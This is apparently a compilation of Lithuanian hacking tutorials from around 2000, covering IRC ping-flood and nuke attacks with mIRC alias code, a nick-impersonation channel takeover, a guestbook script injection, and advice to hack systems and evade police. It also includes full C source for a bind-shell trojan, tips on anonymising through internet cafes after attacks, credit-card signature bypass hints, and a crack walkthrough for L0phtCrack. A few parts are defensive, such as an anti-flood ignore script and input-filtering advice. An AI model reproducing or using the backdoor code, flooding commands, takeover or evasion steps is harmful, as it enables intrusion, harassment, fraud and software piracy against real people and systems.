ir laukiam atsakymo . tajgi gavom atsakyma pvz :
mirc v5.81 (kuo senesne tuo geriau ) ir viskas
nereiketu rautis ant tu pas kuriuos gaunat atsakyma
BichX v.(nesvarbu kokia) ar kaska kas susije su UNIX
(linux . openbsd . ir t.t. nes greiciausiaj nieko
neisheis 😉 . taipogi nepatarciau prasideti su
chiuwakajs ish kuriu gavot pvz : mirc v.(nesvabu) ir dar
gavot kokianors skripto reklama pvz :
[ agurkaz-script by mr2 ] [ http://mr2lt.cjb.net ]
(chia mano skripto varijantas) . nes papraschiausiai
vilties pamokyt toki chiuwaka mazaij . (nors shiaip .
manes karta paprase kad ishmeginchiau jo script (dabar
tixliaj nepamenu koki script) . ir jis luzho zymiaj
greiciau nej zmogus be script . o shiaip atjungsi
chiuwaka nuo servo ar ne dar labaj priklauso nuo tavo
ineto beij jo ineto rysio . tajgi ishiaiskine
chiuwako “kietumo lygi” 😉 ir nusprende ji issabacint
ish servo . pvz : parsisiunchiam agurkaz-script (ish
http://mr2lt.cjb.net) . spaudziam “klonuotiz” ir
prijunge antra mIRC’a prie servo imames chiuwako
mirties . zodziu spaudziam fludaz/ping fludaz
(shis mano (ir netik) nuomone veiksmingiausias) gaunam
“musu tajkinyz ?” irasom musu aukos nick .
“kiek pingu siusim ?” irasom pvz : 1000 (shiaip uztenka
apie 200 . bet tikrumo labuj) . “laikaz (sekundem)
tarp [ping] ?” irasom pvz : 2 (nemaziau 2-ju . o
shiaip wiskas priklauso nuo jusu ineto ryshio
kokybes . kuo prastesne tuo labiau didint .) tik
shikart nespaudziat ok . wiska tapati pasidarot ir
kitame jau paleistam mIRC’e ir viena po kito (abiejuose)
paspaudziat ok . ir pradedat stebet kas vyksta .
stebit ping reply . kur ping reply laikas turetu vis
didet . ir po shiek tiek lajko “blogiukas” padaro
quit (excess flood) 😉 (kad padarys luzhau galima
tiketis gavus ping reply laika . apie 40sek .
ir daugiau . o kartajs ir maziau .) kaj chiuwakas
luzhta . arba pvz : tau niekajp nepavyksta jo
atjabalint . tiesiog sustabdom fluda .
fludaz/sustabdyt visuz fluduz .
tapati galima padaryt i aliases irasius pvz :
/fludazzz {
.set %tajkinys $$?=”musu tajkinys ?”
.timer10 $$?=”ping sk. ?” $$?=”laikas tarp ping ?” /ctcp %tajkinys ping
}
/stopfludazzz {
.timer10 off
}
ir tada norint fludint reik parasyt “/fludazzz” komanda .
o norint nutraukt ping fluda “/stopfludazzz”
(na norint totaliaj pasitychiot ish lamuxos . atjunge
ji pasikeiskit savo klono nick y jo . sugryzes chiuwakas
dar ilgaj stebesis “kas chia do veikejas tokipati nick kajp
mano sugalvojo ? ir dar klausia ‘kaijp sekas lama ? ;)’ ?!?”)
kaip visa taj vyksta ? . ogi paprastaj : servas paprastaj
supyksta jej kaskoks “kenkejas” pradeda be skaiciaus siust
ctcp’us ir jej pvz : “laikaz (sekundem) tarp [ping] ?”
irasytumet pvz : 0 . shiuo atveju servas jus atjungtu
(kaijp kenkeja) parasydamas excess flood . o kaij jus
kaskam siunciat ping’us . tas kaskas i juos atsakineja
pong’ais ir servas supykes uzh vienu metu siunchiama dideli
kieki pong’u ji atjungia . (tam kad greiciau atjungt kokitaj
chiuwaka ir patariama pasidaryt keleta klonu . nes ping’us
tada siuncia keli irc klientaj . o pong’ais atsakineja
vienas 😉
tiesa nevisada ping’inamas chiuwakas atjungiamas (excess flood)
yra ir kitas bajeris (tiesa rechiau suveikiantis) . reiskias
jus pastoviai siunciat tuos ping’us (ish 2-ju ar daugiau klonu)
ir kaijp iprasta servas karts nuo karto siuncia PING “paketa”
t.y. kaskokitaj skaiciu . irc klijentas gaves shi “paketa”
siunchia servuj PONG “paketa” tapati skaiciuka koki gavo .
taj daroma tam kad servas zinotu “esi gyvas ar nebera taves ?”
. ir kaj chiuwako irc klijentas beatsakinedamas i tavo
siunchiamus PING’us pervelaj atsako servuj . servas pagalvoja
kad irc userio nebera . ir nesvarbu yra jis ar ne ji
papraschiausiaj atjungia parasydamas ping timeout (shitas bajeris
suveikia tik tada kaj chiuvako kuri pinginat : senas kompas .
blogas rishys . zodziu kaj chiuwakas ir tajp netoli mirties ir
tereikia truputi jam padet 😉 ) .
na o pamacius kad visa taj daroma su jumis (jus auka 😉 ) .
tiesiog papraschiausiaj reikia uzdeti tam chiuvakui ignora
(komanda : “/ignore [nick’as]”) . (daugelyje skriptu taj
darosi automatiskaj . kaj chiuwakas per tamtikra laika
padaro tamtikra skaiciu ctcp . kad ir pvz : (mano)
agurkaz-script’e)
tapati galima padaryt i remote irasius pvz :
CTCP *:*:* {
if ( %ctcppro. [ $+ [ $nick ] ] == $null ) {
.set %ctcppro. [ $+ [ $nick ] ] 1
.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]
goto pabajga
}
elseif ( %ctcppro. [ $+ [ $nick ] ] == 1 ) {
.set %ctcppro. [ $+ [ $nick ] ] 2
.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]
goto pabajga
}
elseif ( %ctcppro. [ $+ [ $nick ] ] >= 2 ) {
.ignore $nick
.echo -a 10[*] $nick katik isbande (mass) ctcp apsauga
.unset %ctcppro. [ $+ [ $nick ] ]
goto pabajga
}
:pabajga
.halt
}
ir tam kad variables nesirinktu siuksliu .
options/irc/perform/ uzaktyvuoji (varnele)
“on connect,perform these commands :” ir irasaj :
“/unset %ctcppro*” komanda . spaudi [OK]
ping fluda galima daryt netgi pasinaudojus dos’u pvz :
dos’e rasom :
“ping [chiuwako kompo IP]” (chia reikia zhinoti chiuwako
kompo IP adresa . jis suzinomas “/dns [nick’as]” komanda
sia komanda pingas siunchiamas viena karta .)
“ping -l 2800 -t -w 2000 [chiuwako IP]” (staj shia komanda
ir galima atjungt chiuwaka . (nesigilinsiu y tixlumus .
jej norit detaliau . tiesiog parasykit dos’e “ping” ir
gausit gana ishsamia informacija .)) toliau pakalbesiu apie
DOS ataka (nemaisykit dos operacines sist. su Denial Of
Service ataka 😉 )
na zinoma taj ne pac geriausias budas kanors atjabalint
nuo irc servako . kalbu apie DOS (denial of service)
ataka . bet ping fludas manychiau pac populiariausias
tarp irkininku 😉 . apie DOS atakas daug nekalbesiu
(shiaip nuo shios atakos jau gana senaj buvo luzhes net
pac www.microsoft.com na o netajpjau senaij (jej zhiurit
te-ve) nuo jos nukentejo ir www.yahoo.com bej keletas
kitu ineto gigantu 😉 (tiesa uzhpuolikas buvo susemtas
(mafiaboy berods)) ) shi ataka kajp jau supratot yra
gana daug qr naudojama (paprastaj destrukcijos tixlais)
. shios atakos pasekmes neprognozuojamos taj galibut
pradedant nuo paprasto kompo pakibimo iki “format c:”
(zodziu priklauso ant kiek jusu kompas supsixuos)
zodziu naturaliaj inete viskas vyksta taijp : jusu kompas
siunchia kitam kompuj SYN “paketa” t.y. prasyma
prisijunkti prie kito kompo (chia pvz: ftp http telnet)
. kompas (servas) gaves SYN tuojpat siunchia jums
atsakyma ACK “paketa” t.y. patvirtinima apie SYN
uzklausa jusu kompas prisijungima su kitu kompu
uzhtvirtina nauju ACK “paketu” (shio ACK servas laukia
keleta min. sek. ir jej negauna ACK (ish jusu) ishmeta
ish whaitlisto) . na o dabar isivaizduokit kas darosi
jej jus vienu metu uzhplustat serva vien SYN “paketajs”
ir neatsakinedami prisijungima patvirtinanchiais ACK .
ogi dideja servo waitlistas . niekas negali prisijungt
prie servo (jis apkrautas) . ir tarkim jej jus puolat
shi kompa ish keliu kompu vienu metu ankschiau ar veliau
jis padaro “luzhau” (tas pac www.yahoo.com pavizdys)
panasiu principu atakuojami netik servaj bet ir paprasti
kompaj . zodziu apie mIRC’a . pac populiariausias shiu
laiku nuke’ris beabejo “click v2” ji galite parsisiusti
beveijk ish kiekvieno uzhsenietishko servo (daznaj buna
platinamas kartu su mIRC skriptajs) . jis veikia DOS
atakos principu zodziu pasirenkat auka . darot
“/dns [nick’as]” . status lange sulaukiat
“resolved *.*.*.*” (vietoj ->*<- skaiciukaj pvz: 127.0.0.1)
taj yra chiuwako kompo IP adresas (jej gavot
“unable to resolve” tada pysy-propalo . geriau
pamirskit ji) . ji irashot y betkokio nukerio “IP”
langeli ir vaziuojam . laukiam kol chiudikas “mirs” 😉
na beabejo nuo to yra apsaugu pvz : nukenabber . bet
shio dajkchiuko paprastaj niex naudoja (tie kas nori
apsigint nuo visokiu DOS (be DOS dar yra pvz : Smurf .
Land&Teardrop (visu veikimas panasus)) ataku paprastaj
turi pasistate FireWall’us ir ju su shitom atakom nepaimsi ;))
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
tajgi tajgi . tu esi visiskas lama (ar tiesiog gera
nuotajka ir nori pasilinksmint (pagazdint vargsus irc
userius)) (nepagalvokit kad taj darau nuolat (bet
yra buve (neslepsiu)) . shis pamokymas kajptik tau .
pirma ka reikia padaryt besiruosiant teikoverint kanala
aisq reijkia (apgalvotaj) pasirinkt taikini . reiskias
rasaj “/list” ir lauki kol list lange pasirodys visi tuo
metu esami kanalaj . renkiesi nej dideli nej maza .
kokiu 5-9 zmoniu kanala (chia pagal skoni 😉 )
!!!neuzejni i ji!!! . tau pvz : patiko #lamers kanalas
rasaj “/names #lamers” ir status lange pamataj chiuwaku
sedinciu shiame kanale sarasa . !!!patarimas-ispejimas!!! :
kanale kuri pasirinkaj turetu sedeti keli zmones turintys
o’pus (@) t.y. tau reikes bent keliom sekundem atjungti
viena ish ju . ir po vieno ish ju luzhimo kanale turi
likt bent vienas zmogus su @ . t.y. ne botas . ne klonas
nes jis (jej kvailas ir nesupranta kas yra excess flood .
palaikes tave savo draugu) ir turi tau duoti op’a .
kurio tau ir reikia norint takeover’int kanala . toliau :
jej pasirinktam kanale sedi @rkp shita kanala geriau pamirsk 😉
pasirinkus kanala ir chiuwaka kuris tures trumpam luzhti daraj :
“/ctcp [nickas] version” (zodziu kad nesiplesciau pasakysiu
kad reikia ji atjungti nuo irc nors keliom sekundem .)
(apie taj rasiau truputi ankschiau . (jej shizofrenija
sergi)) ji atjungus nuo servo stajgiai keiti savo nick’a i
jo nick’a (tam reijketu iskart pasiruost) ir uzeini y
(musu atveju) #lamers kanala . tada jej pasiseks to
chiuwako draugaj kuri tu katik atjungej tau duos op’a ir poto
manau tu pac zhinaj ka reikia daryti 😉 (massdeop . zodziu
tu turi likt vienas turintis @ priesh savo nick 😉 ) ir tada
daraj kanori su perimtu kanalu . o vargsaj apgautieji tik ir
spjaudos keiksmais . grasina nukeriu . ping fludu 😉 (na jej
esi tikras lama aisq greitaj padaraj luzhau . ir buni
itrauktas tu chiuwaku shitlist’us (sudziu sarasus))
na o norint nuo to apsisaugot . reikia tiesiog but
atidesniais . pamacius quit(excess flood) reiketu isitikint
kad gryzo jusu draugas ir jej esat jums brangiam kanale be rkp
geriau pasisaugokit . (man paciam buvo bajeris kaj 2-se susikurem
nuosalu kanala ishbandyti mano script . uzhejo chiuwakas davem
jam op’sa o tas 2-viem savaitem bota su invite only pastate
(kanalo aisq negajla . laikinas buvo) bet pamokele gera 😉 )
taipogi neuzdejinet autoOPo kad ir net paciam geriausiam drauguj
pagal nick’a . (maza kas gali atsitikt . sugalvos kox loxelis
nick’a kaijp tavo draugo pasiimt ir uzheis netycia y kanala .
gaus op’a ir priximicins)
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ autorius : mr2 ウ
ウ data : 2000 ウ
ウ url : http://mr2lt.cjb.net ウ
ウ @mail : mr2@xxx.lt ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
(shi straipsneli leidziu laisvaj platinti inete be mano leidimo tik
butu labaj grazu kad jo turinys nesikeistu . o del gramatiniu
klaidu nepykit (ne spaudaj ji parashiau 😉 ) jej aciras norinciu kad
parasychiau tutorial’a apie mIRC skriptu rasyma . ar norinciu
patart . pataisyt . papildyt shi TUT . mano @mujla zhinot)
(mIRC’e mane galit rasti pvz : #mr2 kanale nick: “mr2” arba “agurkaz”)
21. Kaip nesielgti hakinant
Kaip nesielgti Jus taip nedarykite Vasara del savo neismanymo nukentejo daugelis Lietuvos svetainiu: centras.lt search.lt ir kitos, kuriose buvo skelbimu lentos ar guestbook`ai. As maniau, kad tai buvo gera pamoka ju administratoriams, bei visiems kitiems. Bet pasirodo as klydau. Viena diena, narsydamas www ir sededamas IRC radau nuoroda i viena idomu puslapi: www.satan.lt – juodosios brolijos puslapis. Uzsukes i ji ir perzvelges, sumaniau uzsukti i guestbook`a ir pagirti saita. Uzsikrovus guestbook`ui pamaciau kazka panasaus i tai: galima ivesti html komandas. Pvz: vietoj [ENTER] galima rasyti
. Ir ka jus apie tai manot??????????? Ar tai ne administratoriu klaida, baisi klaida? Bet, pagalvojau as, gal jie nors JavaScrip filtruoja? Tad as emiau ir isbandziau tai. Paprasciausiai irasiau prie savo girtino/peiktino teksto keles eilutes: ; beto idejau nuoroda i uid0 saita: Aisku as galejau visiskai sudirbti si saita: JavaScript pagalba galejau atidaryneti, uzdarineti langus, bei daug daug kitko, iterpus nuoroda i file:///con/con/ galejau nukepti visus win 9.x vartotojus, kurie ten uzklystu. Bet as taip nesiilgiau. As paprasciausiai padariau tik ispejima puslapio webmaster`iui. Kur sio dokumento vertes objektas? Viena kart ismokite daryti tai gerai, ismokite mokytis ne tik is savo bet ir is kito klaidu. Filtruokite savo chat`uose, guestbook`uose, mesage bourde`uose ir kitur kur lankytojai gali ivest teksta (ir jis bus spausdinamas html dokumente) visus HTML tagus, neleiskite vykdyti JavaScript, VisualBasic ir pan. Narsykite www tik isjungia Java. Taip jus isvenksite Java/JavaScript ataku. P.S. As tai nelaikau tikru hackinimu, tai paprasciausiai.
22. Kaip tapti hakeriu
Pirmiausia, manau, apsispresk ar tikrai nori buti hackeriu, nes:
1. Hakeriavimas yra nelegalus (bent daugelyje valstybiu [Lietuvoj kolkas ne]). Netgi tuose valstybese, kuriuose hakerevimas nera antiistatimiskas hakeris vistiek pazeidzia dauguma istatymu. Pvz.: asmens teise i privatuma (E-mail, www, acount ir kt.).
2. Hakeriavimas nera lengvas uzsiemimas, tu turi vis ieskoti ir ieskoti daug info apie naujausius exploitus (arba kaip tikras hakeris juos paciam daryti), ieskoti sistemu klaidu etc. Todel hakervimas dar ir daug laiko uzimantis uzsiemimas. Negalima per savaite tapti hakeriu. Tai pat negalima dometis tuo puse metu ir poto padarius pauze vel gristi. Ne, tu paprasciausiai per daug atsiliktum. Ne taip negalima!
Negalvok, kad filmuose apie hackerius, kopmiuteriu piratus etc rodoma tiesa. Negalvok, kad hakeris koks herojus, gebantis prikirsti visas paneles, dirbantis geroje firmoje etc. Priesingai- ar tau patiktu matyti savo artimuosius, draugus verkencius, liudincius kai tave sujima teisesauga, VSD (valstybes saugumo departamentas).
Bet jai vistiek apsisprendei tapti hakeriu tai pradek kuo greiciau, nes sis informasinis pasaulis keiciasi taip greit, kad nekiekvienas geba ji pasivyti ir neatsilikti.
1.Kaip pradeti?
Daugelyje interneto sistemu stovi UNIX, LINUX, FreeBSD, NetBSD, vienu zodziu, *NIX. Tad norint pradeti hakinti reikia ismokti tai. Aisku negalvok, kad nereikia ismokti windows`u. Priesingai, juos irgi reikia ismanyti. Jei nezinojai yra net ir speciali windowsu versija (distribucija ar pan) skirta serveriams. Tai windows NT.
Taigi griskime prie *NIX. Gauk kokia tai *NIX distribucija, instaliuok ja ir pradek mokytis. Kaip mokytis *NIX? Pradziai gauk pora knygu, tokiu kaip “Linux zaliems” ar pan. Perskaityk jas. Poto imk ka nors rimciau. dalyvauk konferencijuose kuriose snekama ape *NIX. Priprask prie *NIX. Paprogramuok juose. Ismok gerai konfiguruoti sistema. Automatizuok savo veiksmus darydamas skriptus. Ismok *NIX`e (ir netik ten) naudotis internetu (E-mail, telnet, ssh, www, ftp, irc, icq ir kt.). Jei ko nors nezinai nepulk klausineti visu. Paprasciausiai RTFM (read the fucking manual). Niekada negalvok, kad *NIX`e viska jau ismanai.
Na daba jau tu ismanai pakankamai apie *NIX. Gauk savo tikra (ne localu) acounta.
Narsyk www, siurb visa info apie hakinimo metodus, nauja programine iranga, jos klaidas (bug`us). Stenkisc pats rasytis exploitus. Tam turi ismokti keleta programavimo kalbu: c/c++, perl, java.
Prisiregistruok prie ivairiu hakeriu konferenciju, naik i pora IRC serveriu- ten rasi bendraminciu,galesite pasidalinti info ar pan. Nepralesk pro akis nei vieno hack saito.
Ismok neikliuti! Nes kai ikliusi bus per velu! Kaip neikliuti skaityk straipsnyje paranoja.
Ieskok pazeidziamu sistemu ir hakink jas. Tavo tikslas gauti kuo daugiau acount`u is kuriu galetum hakinti kitas sistemas.
Ir jei tu viska darai, kaip parasyta cia- tada gali tapt hakeriu.
23. Kaip veikia trojanai
Cia pabandysiu paiskinti kokiu principu veikia trojanai, kaip jie rasomi etc.
Imkim ir panagrinekim paprasciausia trojana parasyta C kalba:
#include <stdio.h> // iterpiamas standartinio I/O funkciju headeris
#include <errno.h> // klaidu
#include <signal.h%gt; //signalu. Nezinot kas tie signalai? Tai kaip jus naudojates kill programa?
#include <stdlib.h>
#include <netinet/in.h> // iterpemi visi headeriu failai reikalingi dirbti su tinklu, socket ir pan.
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h> // darbui su eilutem
// Nusirodyk koki tavo trojanas porta naudos, naudok koki standartini- gali lama adminas pamirses sumaisyt su kokiu ftp_data (20 portas) ar pan
// Kitu atveju naudok koki kita porta kuris maziau stebimas
#define P 12345 // ant prikolo imam netbus porta
#define SH “/bin/sh” // nusirodai koki shella naudos tavo trojanas
#define LISTN 5
int main(int argc, char **argv)
{
//pasveikinimo (welkome) zinute
char *fst = “nConnected!nn”;
char *sec = “This tool demonstrated how works trojansn”;
char *thr = “Please enter each command followed by ‘;’n”;
int outsock, insock, sz; //soketu deskriptoriai, ir pagalbinis kintamasis, kuris saugos eiluciu dydi (size)
//reikalingos dvi soketu sructuros (irasai) in ir out
struct sockaddr_in home;
struct sockaddr_in away;
//set port, proto and bzero for BIND
home.sin_family=AF_INET;
home.sin_port=htons(P); // atkreipk demesi cia nurodomas taviskis portas
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);
signal(SIGCHLD,SIG_IGN);
// pats idomumas prasideda
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0) // ar su soketais viskas ore
exit(printf(“Socket errorn”));
if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) // ar bindina ore
exit(printf(“Bind errorn”));
if((listen(outsock,LISTN))<0) //ar listina
exit(printf(“Listen errorn”));
sz=sizeof(struct sockaddr_in);
// jo cia tai tikrai strukturinis programavimas
for(;;) // o rimciau tai amzinas ciklas
{
if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0) //laukiam isoriniu signalu, tuo paciu tikrinam ar nera klaidos
exit(printf(“Accept error”));
if(fork() !=0) //jei sukuriam, dukterini (child) procesa
{
send(insock,fst,strlen(fst),0); // siunciam sveikinimo zinute
send(insock,sec,strlen(sec),0);
send(insock,thr,strlen(thr),0);
dup2(insock,0); // nukreipem STDIN (file deskriptos=0) i soketa
dup2(insock,1); // nukreipiam STDOUT (file deskriptos=1) i soketa
dup2(insock,2); // nukreipiam STDERR (file deskriptos=2) i soketa
execl(SH,SH,(char *)0); // paleidziam savo shella
close(insock); // uzdarom soketa
exit(0); // stai ir baigesi musu sudetingas trojanas.
}
close(insock); // jei nejo sukurt dukterinio proceso (ziureti fork() ) tai uzdarom ansyk soketa ie einam lauk.
}
}
Stai taip atrodo pats elementariausias trojanas. O jus turbut manete, kad tai sudetinga. Siaip sis trojanas ira gan blogas. Jei norite gero trojano eikit i
http://packetstorm.securify.com
ir isten temkit r00tkit`a. Siuo metu as kaip tik apsistojes ties trojanu rasymu, kai parasysiu koki krutesni imesiu. Tad laukite.
Kas sake kad lietuviai trojanu neraso?
Kaip anonimizuotis kitu budu/keliu
By Whisperer // whisperer@worldmailer.com for www.underground.lt
Visi nori anonimizuotis. Visi privalo anonimizuotis jeigu uzsiima ne tik narshymu po puslapius apie geliu auginima, o daro ka nors nelegalaus. Populiariausias budas proxy servai. Tachiau su vienu nieko nepadarysi. Jeigu tikrai nori gerai anonimizuotis turi susijungti i grandine proxy1>proxy2>proxy3 etc. Dar geriau jeigu tie proxiai kinietishki, japanski ar dar kokie (sunkiau susisiekti su ju adminais ir gauti tavo ip adresa)
Tachaiu sparta ziauriai, ziauriai krenta. Ir norint patekti i vilniu ish kauno gaunasi vaziavimas per klaipeda. Ash siulau kita buda. Mieste pilna (bent jau Kaune) visokiu internet’o kaviniu ir t.t. Kai kurios labai nuoshalios ir ten tam tikrom valandom nebuna daug zmoniu (pvz. Sonex’as savanoriu prospekte prie Juzes). Mokestis iki 6 lt uz valanda. Ateini, atsineshi savo irankius, savo reikalinga infa, pasedi valandele, nuhackini ka nors ir pasishalini. Atseks ip adresa nuhackinto servo adminai ir bus jiems ledas. Aishu jeigu nori galima ir ish ten jungtis per kelis proxius (paprastai tokiose vietose ryshys boona geresnis nei per dial-up’a) ir “nuskriausti” adminai tures dar daugiau vargo. Mazai tiketina kad zmogus prileides tave prie interno atsimins ir gales nupasakoti tavo ishvaizda, o tavo duomenu jis nezinos. Aishku nebookit durniai neikit antra kart i ta pachia vieta.
kam daryti sunkiau jei galima lengviau?
2000(c) by Whisperer // whisperer@worldmailer.com
24. KREDITINES KORTELES
Parenge: MG, 1999, Kaunas
Pagal: ‘Credit Carding’ by David Lightman and ‘The Administration’
Kreditines korteles turi mazhiausia 3 apsaugos priemones, kuriu jus
neturetumete iveikti. Tai yra saskaitos numeris, parasho laukas ir
magnetine juosta.
Saskaitos numeris
——————
Telefono numeris kartu su miesto kodu turi 8 skaiczius, asmens kodas – 11.
Tacziau pilnas MasterCard kreditines korteles saskaitos numeris turi 20
skaicziu. Kam tiek daug?
Matematishkai kreditines korteles numeriui pakanka ashtuoniu skaicziu.
Kiekvienas korteles savininkas, be abejo, turi tureti unikalu,
nesikartojanti numeri. Kompanijos Visa ir MasterCard turi mazhdaug po
65 mln. klientu kiekviena. Taigi ju numeracijos sistemos turi sutalpinti apie
65 milijonus imanomu numeriu.
Egzistuoja shimtas milijonu imanomu kombinaciju ish ashtuoniu skaicziu:
00000000, 00000001, 00000002, 00000003, .. iki 99999999. Taigi, ashtuoniu
skaicziu visishkai pakanka. Ateities augimui numatyti, saskaitos numeriui
pakaktu devyniu skaicziu, kas uzhtikrina milijarda skirtingu numeriu.
Faktishkai, Visa kortele turi 13 skaicziu, American Express – 15, Diners
Club korteles – 14, Carte Blanche – 10. Abejotina, kad kredito kompanijos
planuoja tureti visus shiuos milijardus klientu ir suteikti jiems
skirtingus numerius. Shie papildomi skaicziai reikalingi saugumo
sumetimais.
Tarkime, jusu Visa korteles numeris yra 4211 503 417 268. Kiekvienas
pirkinys turi buti ivestas i kompiuteri ish prekybos terminalo. Saskaitos
numeris susieja pirkini su jusu saskaita. Asmenys, ivedantys saskaitu
numerius i kompiuteri gali kartais suklysti ir ivesti pvz. 4211 503 471 268
arba 4211 703 417 268. Taigi shios trylikos skaitmenu numeracijos sistemos
privalumas yra tas, kad tikimybe, kas kitas klientas tures saskaitos numeri
atitinkanti 4211 503 471 268 arba 4211 703 417 268 labai mazha. Egzistuoja
10 trilijonu imanomu trylikos skaitmenu Visa numeriu (0000 000 000 000;
0000 000 000 001; ... 9999 999 999 999). Tik apie 65 mln ish ju yra
tikri, egzistuojantys saskaitu numeriai. Tikimybe, kad klaidingai ivestas
korteles numeris atitiks egzistuojanti numeri yra kazhkas apie 1 prie
150 000. Kitos korteliu numeracijos sistemos yra dar saugesnes. Ish
kvadrilijono imanomu penkiolikos skaitmenu American Express korteliu
numeriu tik 11 milijonu yra naudojami. Tikimybe kad atsitiktinai surinktas
numeris atitiks egzistuojanczios saskaitos numeri yra mazhdaug 1 prie
90 000 000. Imant visus 20 MasterCard numerio skaitmenu, yra kvintilijonas
(100 000 000 000 000 000 000) imanomu numeriu 65 milijonams klientu.
Galimybe atitaikyti numeri czia nevirshija vieno prie pusantro trilijono.
Be kita ko, tokia sistema suteikia galimybe ‘neakivaizdinei’ prekybai,
apmokant kreditinem kortelem. Pvz., kai TV-reklamos siulo skambinti ir
uzhsisakyti kokia nors preke telefonu, operatores, kurios priima uzhsakymus
negali matyti nei kreditines korteles, nei jos savininko parasho. Kaip jos
gali zhinoti, ar skambinantysis ishvis turi kreditine kortele?
Jie grindzhia savo pasitikejima kreditiniu korteliu numeracijos sistemos
saugumu. Jeigu kas nors skambina ir panaudoja ishgalvota numeri, shis
numeris, tikriausia, neatitiks egzistuojanczios saskaitos numerio. Ar toks
numeris egzistuoja ar ne, galima patikrinti labai greitei, pasijungus prie
kredito kompaniju kompiuteriu. Visais praktiniais tikslais, naudojant leva
kreditkes numeri, yra vienintelis budas – nuskaityti ji nuo
egzistuojanczios kredito korteles. Plastiko gabaliukas nera butinas, pakanka
numerio.
Parasho laukas
—————
Jus negaletumete ishtrinti parasho korteleje, jeigu gaunate leva
kreditke. Jeigu jus ar kas nors kitas megintumete tai padaryti, greit
isitikintumete, kad kortele tampa visishkai nebetinkama naudoti, (bent jau
jos jau negalima rodyti). Kai kurios korteles turi specialu parasho lauko
pagrindo dizaina(linijini ornamenta), kuris nusitrina, jei kas nors bando
ishtrinti parasha, paliekant balta plema. Ant kitu, bandant ishtrinti
parasha, pro pazheista parasho lauko pagrinda pasirodo zhodis ‘VOID’,
zhymintis korteles netinkamuma naudoti.
Budas apeiti shia saugumo priemone
Jeigu parasho laukas neapsaugotas linijiniu ornamentu arba sunkiai
atkartojama spalva, parasho lauka galima uzhdazhyti.
Magnetine juosta
—————-
Daugelis mano, kad magnetineje juostoje uzhkoduota daug informacijos
apie korteles savininka, arba apie saskaitos balansa. Realiai, joje
neimanoma irashyti daugiau, nei i panashaus ilgio garso kasetes juosta.
Ishtikruju magnetineje juostoje pakanka irashyti saskaitos numeri ar
kitokia identifikacijos priemone. Bet kokia kita informacija, reikalinga
pinigu pervedimui atlikti, tokia pvz. kaip saskaitos balansas, gali buti
ishtraukta ish banku kompiuteriu ir nera reikalo kodoti jos paczhioje
korteleje. Ta pati galima pasakyti del informacijos apie korteles
savininka. Be identifikacijos, magnetineje juostoje gali buti irashyta
galiojimo data, nes bankomatai kartais ‘prarija’ kortele, kai jos galiojimo
laikas pasibaiges, netgi jeigu balansas yra tvarkoj.
Informacija magnetineje juostoje galima ishtrinti palaikius virsh jos
stipru magneta.
25. L0phtCrack v2.5 krekinimas
Info:
Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)
Irankiai: SoftICE, WinDasm, UCOL Patch Maker, Betkoks šešioliktainis redaktorius
Taikinys: L0phtCrack v2.5 (www.l0pht.com/l0phtcrack)
Intro:
Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti.
Pora sakinių:
Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, WinDasm, šešioliktainį redaktorių ir asembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.
Suderinimas:
SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.
Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):
.
INIT=”CODE ON; X;”
.
EXP=c:windowssystemkernel32.dll
EXP=c:windowssystemuser32.dll
EXP=c:windowssystemgdi32.dll
.
Kombinacijos:
Ctrl+D – įeiti į SoftICE;
F5 – įšeiti iš SoftICE;
F10 – vykdyti programą po vieną eilutę;
F8 – jeigu esame ant procedūros, įeiti į ją.
Visus įrankius galima atsisiųsti iš http://ucol.home.lt/cgi-bin/ucol.pl?l_tools.
Krekinimas:
Pirmiausiai reikia nukopijuoti failą l0phtcrack.exe į kokią saugią vietą (to reikės vėliau). Dabar paleidžiame pačią programą (L0phtCrack), spaudžiame mygtuką „Register” ir lauke „Unlock code:” įvedame betką ir žiūrime į iššokusią žinutę: “You have entered an invalid code. Please try again”. Dabar įeiname į disasemblerį (WinDasm). Atidarome failą l0phtcrack.exe (jis yra krekinamos programos direktorijoje). Vykdome paiešką pagal matytą žinutę: “You have entered an invalid code”, t.y. einame į WinDasm meniu sklitį „Search” ir vykdome komandą „Find Text”. Lauke „Find what:” ir įvedame tą žinutę. WinDasm lange atsiduriame čia:
.
:0040635F 52 push edx
:00406360 50 push eax
:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas
:00406366 83C408 add esp, 00000008
:00406369 85C0 test eax, eax
:0040636B 7435 je 004063A2 <- ar mūsų unlock geras/blogas
:0040636D 6A00 push 00000000
:0040636F 6A00 push 00000000
* Possible StringData Ref from Data Obj ->”You have entered an invalid code. “
->”Please try again.” <- mūsų žinutė
:00406371 6830354800 push 00483530
:00406376 E8F0020500 call 0045666B
:0040637B 56 push esi
:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]
:00406383 E812EE0300 call 0044519A
:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]
:0040638F E88ED50300 call 00443922
:00406394 83F801 cmp eax, 00000001
:00406397 0F846EFFFFFF je 0040630B
.
